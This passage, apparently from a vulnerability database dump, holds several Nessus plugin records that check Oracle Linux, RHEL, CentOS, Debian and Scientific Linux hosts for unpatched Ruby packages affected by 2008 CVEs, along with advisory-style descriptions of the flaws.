script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb 
/ ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:20:19", "bulletinFamily": "scanner", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/34465", "published": "2008-10-22T00:00:00", "title": "RHEL 3 : ruby (RHSA-2008:0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0896. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34465);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"RHEL 3 : ruby (RHSA-2008:0896)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. 
(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0896\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0896\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"irb-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:15:08", "bulletinFamily": "scanner", "description": "Updated ruby 
packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/34462", "published": "2008-10-22T00:00:00", "title": "CentOS 3 : ruby (CESA-2008:0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0896 and \n# CentOS Errata and Security Advisory 2008:0896 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34462);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/25 13:36:04\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"CentOS 3 : ruby (CESA-2008:0896)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several 
security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b770fbcf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a367838f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015343.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9465e3d8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-mode-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"ruby-tcltk-1.6.8-13.el3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-mode / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:21:02", "bulletinFamily": "scanner", "description": "The regular expression engine of Ruby, a scripting language, contains\na memory leak which can be triggered remotely under certain\ncircumstances, leading to a denial of service condition (CVE-2008-3443\n).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.", "modified": 
"2019-11-02T00:00:00", "id": "DEBIAN_DSA-1695.NASL", "href": "https://www.tenable.com/plugins/nessus/35294", "published": "2009-01-06T00:00:00", "title": "Debian DSA-1695-1 : ruby1.8, ruby1.9 - memory leak", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1695. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35294);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2008-3443\");\n script_bugtraq_id(30682);\n script_xref(name:\"DSA\", value:\"1695\");\n\n script_name(english:\"Debian DSA-1695-1 : ruby1.8, ruby1.9 - memory leak\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The regular expression engine of Ruby, a scripting language, contains\na memory leak which can be triggered remotely under certain\ncircumstances, leading to a denial of service condition (CVE-2008-3443\n).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=494401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1695\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Ruby packages.\n\nFor the stable distribution (etch), this problem has been 
fixed in\nversion 1.8.5-4etch4 of the ruby1.8 package, and version\n1.9.0+20060609-1etch4 of the ruby1.9 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"irb1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"irb1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8-dbg\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9-dbg\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif 
(deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-dev\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-elisp\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-examples\", reference:\"1.8.5-4etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-dev\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-elisp\", reference:\"1.9.0+20060609-1etch4\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-examples\", reference:\"1.9.0+20060609-1etch4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:12:47", "bulletinFamily": "scanner", "description": "The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. 
(CVE-2008-3905)\n\nRuby", "modified": "2019-11-02T00:00:00", "id": "SL_20081021_RUBY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60485", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60485);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:17\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. 
